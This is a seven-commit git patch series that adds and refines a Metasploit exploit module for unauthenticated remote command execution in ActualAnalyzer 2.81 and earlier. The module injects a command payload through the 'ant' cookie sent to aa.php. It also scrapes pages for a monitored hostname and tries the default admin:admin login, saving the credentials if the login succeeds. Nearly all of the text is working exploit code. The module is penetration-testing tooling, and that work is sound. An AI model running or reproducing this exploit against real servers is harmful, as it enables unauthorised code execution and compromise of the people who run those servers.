From 42744e56503be7975648f3890721634a9d4f0438 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Sat, 6 Dec 2014 19:09:20 +0000
Subject: [PATCH 1/7] Add actualanalyzer_ant_cookie_exec exploit

---
 .../webapp/actualanalyzer_ant_cookie_exec.rb  | 242 ++++++++++++++++++
 1 file changed, 242 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb

diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
new file mode 100644
index 0000000000..b4e3602d89
--- /dev/null
+++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -0,0 +1,242 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => "ActualAnalyzer 'ant' Cookie Command Execution",
+      'Description'     => %q{
+          This module exploits a command execution vulnerability in
+        ActualAnalyzer version 2.81 and prior.
+
+        The 'aa.php' file allows unauthenticated users to
+        execute arbitrary commands in the 'ant' cookie.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Benjamin Harris', # Discovery and exploit
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'References'      =>
+        [
+          ['EDB', '34450'],
+          ['OSVDB', '110601']
+        ],
+      'Payload'         =>
+        {
+          'Space'       => 4096, # HTTP cookie
+          'DisableNops' => true,
+          'BadChars'    => "\x00"
+        },
+      'Arch'            => ARCH_CMD,
+      'Platform'        => 'unix',
+      'Targets'         =>
+        [
+          # Tested on ActualAnalyzer versions 2.81 and 2.75 on Ubuntu
+          ['ActualAnalyzer <= 2.81', { 'auto' => true }]
+        ],
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Aug 28 2014',
+      'DefaultTarget'   => 0))
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
+          OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
+          OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
+          OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
+        ], self.class)
+  end
+
+  #
+  # Checks if target is running ActualAnalyzer <= 2.81
+  #
+  def check
+    # check for aa.php
+    res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php'))
+    if !res
+      vprint_error("#{peer} - Connection failed")
+      return Exploit::CheckCode::Unknown
+    elsif res.code == 404
+      vprint_error("#{peer} - Could not find aa.php")
+      return Exploit::CheckCode::Safe
+    elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/
+      vprint_error("#{peer} - ActualAnalyzer is not installed. Try installing first.")
+      return Exploit::CheckCode::Detected
+    end
+    # check version
+    res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php'))
+    if !res
+      vprint_error("#{peer} - Connection failed")
+      return Exploit::CheckCode::Unknown
+    elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) ([\d\.]+)"/
+      version = $1
+      vprint_status("#{peer} - Found version: #{version}")
+      return Exploit::CheckCode::Vulnerable if version =~ /^2\.(81|80|[0-7])/
+      return Exploit::CheckCode::Detected
+    elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/
+      return Exploit::CheckCode::Detected
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  #
+  # Try to retrieve a valid analytics host from view.php unauthenticated
+  #
+  def get_analytics_host_view
+    analytics_host = nil
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'view.php'),
+      'vars_post' => {
+        'id_h' => '',
+        'listp' => '',
+        'act_h' => 'vis_int',
+        'oldact' => 'vis_grpg',
+        'tint_h' => '',
+        'extact_h' => '',
+        'home_pos' => '',
+        'act' => 'vis_grpg',
+        'tint' => 'total',
+        'grpg' => '201',
+        'cp_vst' => 'on',
+        'cp_hst' => 'on',
+        'cp_htst' => 'on',
+        'cp_reps' => 'y',
+        'tab_sort' => '1_1'
+      }
+    )
+    if !res
+      vprint_error("#{peer} - Connection failed")
+    elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/([^\/^<]+)/
+      analytics_host = $1
+      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
+    else
+      vprint_status("#{peer} - Could not find any hosts on view.php")
+    end
+    analytics_host
+  end
+
+  #
+  # Try to retrieve a valid analytics host from code.php unauthenticated
+  #
+  def get_analytics_host_code
+    analytics_host = nil
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'code.php'),
+      'vars_get' => {
+        'pid' => '1'
+      }
+    )
+    if !res
+      vprint_error("#{peer} - Connection failed")
+    elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
+      analytics_host = $1
+      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
+    else
+      vprint_status("#{peer} - Could not find any hosts on code.php")
+    end
+    analytics_host
+  end
+
+  #
+  # Try to retrieve a valid analytics host from admin.php with creds
+  #
+  def get_analytics_host_admin
+    analytics_host = nil
+    user = datastore['USERNAME']
+    pass = datastore['PASSWORD']
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin.php'),
+      'vars_post' => {
+        'uname' => user,
+        'passw' => pass,
+        'id_h' => '',
+        'listp' => '',
+        'act_h' => '',
+        'oldact' => 'pages',
+        'tint_h' => '',
+        'extact_h' => '',
+        'param_h' => '',
+        'param2_h' => '',
+        'home_pos' => '',
+        'act' => 'dynhtml',
+        'set.x' => '11',
+        'set.y' => '11'
+      }
+    )
+    if !res
+      vprint_error("#{peer} - Connection failed")
+    elsif res.code == 200 && res.body =~ />Login</
+      vprint_status("#{peer} - Login failed.")
+    elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
+      analytics_host = $1
+      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
+      print_good("#{peer} - Login successful! (#{user}:#{pass})")
+      service_data = {
+        address: rhost,
+        port: rport,
+        service_name: (ssl ? 'https' : 'http'),
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+      }
+      credential_data = {
+        origin_type: :service,
+        module_fullname: self.fullname,
+        private_type: :password,
+        private_data: pass,
+        username: user
+      }
+      credential_data.merge!(service_data)
+      credential_core = create_credential(credential_data)
+      login_data = {
+        core: credential_core,
+        last_attempted_at: DateTime.now,
+        status: Metasploit::Model::Login::Status::SUCCESSFUL
+      }
+      login_data.merge!(service_data)
+      create_credential_login(login_data)
+    else
+      vprint_status("#{peer} - Could not find any hosts on admin.php")
+    end
+    analytics_host
+  end
+
+  def exploit
+    if datastore['ANALYZER_HOST'].nil? || datastore['ANALYZER_HOST'] == ''
+      analytics_host = get_analytics_host_code
+      analytics_host = get_analytics_host_view if analytics_host.nil?
+      analytics_host = get_analytics_host_admin if analytics_host.nil?
+      analytics_host = vhost if analytics_host.nil?
+    else
+      analytics_host = datastore['ANALYZER_HOST']
+    end
+    vuln_cookies = %w(anw anm)
+    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'aa.php'),
+      'vars_get' => { 'anp' => analytics_host },
+      'cookie' => "ant=#{payload.encoded}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
+    )
+    if !res
+      fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out")
+    elsif res.code == 302 && res.headers['Content-Type'] =~ /image/
+      print_good("#{peer} - Payload sent successfully")
+    elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/
+      fail_with(Failure::BadConfig, "#{peer} - Host '#{analytics_host}' is not monitored by ActualAnalyzer. set ANALYZER_HOST to specify.")
+    elsif res.code == 200 && res.body =~ /Admin area<\/title>/
+      fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Something went wrong")
+    end
+  end
+end

From 1d1aa5838ff4755fa14570249cd89af7515a3d75 Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Fri, 12 Dec 2014 09:46:23 -0800
Subject: [PATCH 2/7] Use Gem::Version to compare versions in check

---
 modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
index b4e3602d89..a0049f35fb 100644
--- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
+++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
     elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) ([\d\.]+)"/
       version = $1
       vprint_status("#{peer} - Found version: #{version}")
-      return Exploit::CheckCode::Vulnerable if version =~ /^2\.(81|80|[0-7])/
+      return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new('2.81')
       return Exploit::CheckCode::Detected
     elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/
       return Exploit::CheckCode::Detected

From 24f1b916e0ca1dcbde2b8e1406f319ab563a4423 Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Fri, 12 Dec 2014 09:30:44 -0800
Subject: [PATCH 3/7] Minor ruby style cleanup

---
 .../webapp/actualanalyzer_ant_cookie_exec.rb  | 42 +++++++++----------
 1 file changed, 20 insertions(+), 22 deletions(-)

diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
index a0049f35fb..3c2bff3d8d 100644
--- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
+++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -11,10 +11,11 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'            => "ActualAnalyzer 'ant' Cookie Command Execution",
       'Description'     => %q{
-          This module exploits a command execution vulnerability in
+        This module exploits a command execution vulnerability in
         ActualAnalyzer version 2.81 and prior.
 
         The 'aa.php' file allows unauthenticated users to
@@ -47,13 +48,14 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'      => false,
       'DisclosureDate'  => 'Aug 28 2014',
       'DefaultTarget'   => 0))
-      register_options(
-        [
-          OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
-          OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
-          OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
-          OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
-        ], self.class)
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
+        OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
+        OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
+        OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
+      ], self.class)
   end
 
   #
@@ -77,8 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
     if !res
       vprint_error("#{peer} - Connection failed")
       return Exploit::CheckCode::Unknown
-    elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) ([\d\.]+)"/
-      version = $1
+    elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/
       vprint_status("#{peer} - Found version: #{version}")
       return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new('2.81')
       return Exploit::CheckCode::Detected
@@ -116,13 +117,12 @@ class Metasploit3 < Msf::Exploit::Remote
     )
     if !res
       vprint_error("#{peer} - Connection failed")
-    elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/([^\/^<]+)/
-      analytics_host = $1
+    elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/
       vprint_good("#{peer} - Found analytics host: #{analytics_host}")
+      return analytics_host
     else
       vprint_status("#{peer} - Could not find any hosts on view.php")
     end
-    analytics_host
   end
 
   #
@@ -138,13 +138,12 @@ class Metasploit3 < Msf::Exploit::Remote
     )
     if !res
       vprint_error("#{peer} - Connection failed")
-    elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
-      analytics_host = $1
+    elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
       vprint_good("#{peer} - Found analytics host: #{analytics_host}")
+      return analytics_host
     else
       vprint_status("#{peer} - Could not find any hosts on code.php")
     end
-    analytics_host
   end
 
   #
@@ -178,8 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
       vprint_error("#{peer} - Connection failed")
     elsif res.code == 200 && res.body =~ />Login</
       vprint_status("#{peer} - Login failed.")
-    elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
-      analytics_host = $1
+    elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
       vprint_good("#{peer} - Found analytics host: #{analytics_host}")
       print_good("#{peer} - Login successful! (#{user}:#{pass})")
       service_data = {
@@ -191,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
       }
       credential_data = {
         origin_type: :service,
-        module_fullname: self.fullname,
+        module_fullname: fullname,
         private_type: :password,
         private_data: pass,
         username: user
@@ -205,10 +203,10 @@ class Metasploit3 < Msf::Exploit::Remote
       }
       login_data.merge!(service_data)
       create_credential_login(login_data)
+      return analytics_host
     else
       vprint_status("#{peer} - Could not find any hosts on admin.php")
     end
-    analytics_host
   end
 
   def exploit

From 1e6bbc5be87746146ba7b0b248cc09830bc103e0 Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Fri, 12 Dec 2014 09:51:08 -0800
Subject: [PATCH 4/7] Use blank?

---
 modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
index 3c2bff3d8d..1c40e32a28 100644
--- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
+++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -210,7 +210,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    if datastore['ANALYZER_HOST'].nil? || datastore['ANALYZER_HOST'] == ''
+    if datastore['ANALYZER_HOST'].blank?
       analytics_host = get_analytics_host_code
       analytics_host = get_analytics_host_view if analytics_host.nil?
       analytics_host = get_analytics_host_admin if analytics_host.nil?

From 00f66b605038fa073abe42eb2293ae9fa0607f37 Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Fri, 12 Dec 2014 10:22:14 -0800
Subject: [PATCH 5/7] Correct named captures

---
 .../unix/webapp/actualanalyzer_ant_cookie_exec.rb         | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
index 1c40e32a28..c5727028d8 100644
--- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
+++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
     if !res
       vprint_error("#{peer} - Connection failed")
       return Exploit::CheckCode::Unknown
-    elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/
+    elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body
       vprint_status("#{peer} - Found version: #{version}")
       return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new('2.81')
       return Exploit::CheckCode::Detected
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
     )
     if !res
       vprint_error("#{peer} - Connection failed")
-    elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/
+    elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body
       vprint_good("#{peer} - Found analytics host: #{analytics_host}")
       return analytics_host
     else
@@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
     )
     if !res
       vprint_error("#{peer} - Connection failed")
-    elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
+    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
       vprint_good("#{peer} - Found analytics host: #{analytics_host}")
       return analytics_host
     else
@@ -177,7 +177,7 @@ class Metasploit3 < Msf::Exploit::Remote
       vprint_error("#{peer} - Connection failed")
     elsif res.code == 200 && res.body =~ />Login</
       vprint_status("#{peer} - Login failed.")
-    elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/
+    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
       vprint_good("#{peer} - Found analytics host: #{analytics_host}")
       print_good("#{peer} - Login successful! (#{user}:#{pass})")
       service_data = {

From 55d9e9cff6ec4781c75ab43bc13ae7b64ec64396 Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Sun, 14 Dec 2014 23:15:41 +1100
Subject: [PATCH 6/7] Use list of potential analytics hosts

---
 .../webapp/actualanalyzer_ant_cookie_exec.rb  | 36 ++++++++++++-------
 1 file changed, 23 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
index c5727028d8..c454682341 100644
--- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
+++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -209,32 +209,42 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
-  def exploit
-    if datastore['ANALYZER_HOST'].blank?
-      analytics_host = get_analytics_host_code
-      analytics_host = get_analytics_host_view if analytics_host.nil?
-      analytics_host = get_analytics_host_admin if analytics_host.nil?
-      analytics_host = vhost if analytics_host.nil?
-    else
-      analytics_host = datastore['ANALYZER_HOST']
-    end
+  def execute_command(cmd, opts = { :analytics_host => vhost })
     vuln_cookies = %w(anw anm)
-    print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'aa.php'),
-      'vars_get' => { 'anp' => analytics_host },
-      'cookie' => "ant=#{payload.encoded}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
+      'vars_get' => { 'anp' => opts[:analytics_host] },
+      'cookie' => "ant=#{cmd}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
     )
     if !res
       fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out")
     elsif res.code == 302 && res.headers['Content-Type'] =~ /image/
       print_good("#{peer} - Payload sent successfully")
+      return true
     elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/
-      fail_with(Failure::BadConfig, "#{peer} - Host '#{analytics_host}' is not monitored by ActualAnalyzer. set ANALYZER_HOST to specify.")
+      vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.")
     elsif res.code == 200 && res.body =~ /Admin area<\/title>/
       fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.")
     else
       fail_with(Failure::Unknown, "#{peer} - Something went wrong")
     end
   end
+
+  def exploit
+    analytics_hosts = []
+    if datastore['ANALYZER_HOST'].blank?
+      analytics_hosts << get_analytics_host_code
+      analytics_hosts << get_analytics_host_view
+      analytics_hosts << get_analytics_host_admin
+      analytics_hosts << vhost
+      analytics_hosts << '127.0.0.1'
+      analytics_hosts << 'localhost'
+    else
+      analytics_hosts << datastore['ANALYZER_HOST']
+    end
+    analytics_hosts.uniq.each do |host|
+      vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")
+      break if execute_command(payload.encoded, { :analytics_host => host })
+    end
+  end
 end

From 4530066187f9df6bbaff12eb881e86c6c2971c9a Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Mon, 15 Dec 2014 01:04:39 +1100
Subject: [PATCH 7/7] return nil

---
 .../exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb   | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
index c454682341..b1c00be236 100644
--- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
+++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -123,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       vprint_status("#{peer} - Could not find any hosts on view.php")
     end
+    nil
   end
 
   #
@@ -144,6 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       vprint_status("#{peer} - Could not find any hosts on code.php")
     end
+    nil
   end
 
   #
@@ -207,6 +209,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       vprint_status("#{peer} - Could not find any hosts on admin.php")
     end
+    nil
   end
 
   def execute_command(cmd, opts = { :analytics_host => vhost })
@@ -228,6 +231,7 @@ class Metasploit3 < Msf::Exploit::Remote
     else
       fail_with(Failure::Unknown, "#{peer} - Something went wrong")
     end
+    nil
   end
 
   def exploit
@@ -243,6 +247,7 @@ class Metasploit3 < Msf::Exploit::Remote
       analytics_hosts << datastore['ANALYZER_HOST']
     end
     analytics_hosts.uniq.each do |host|
+      next if host.nil?
       vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")
       break if execute_command(payload.encoded, { :analytics_host => host })
     end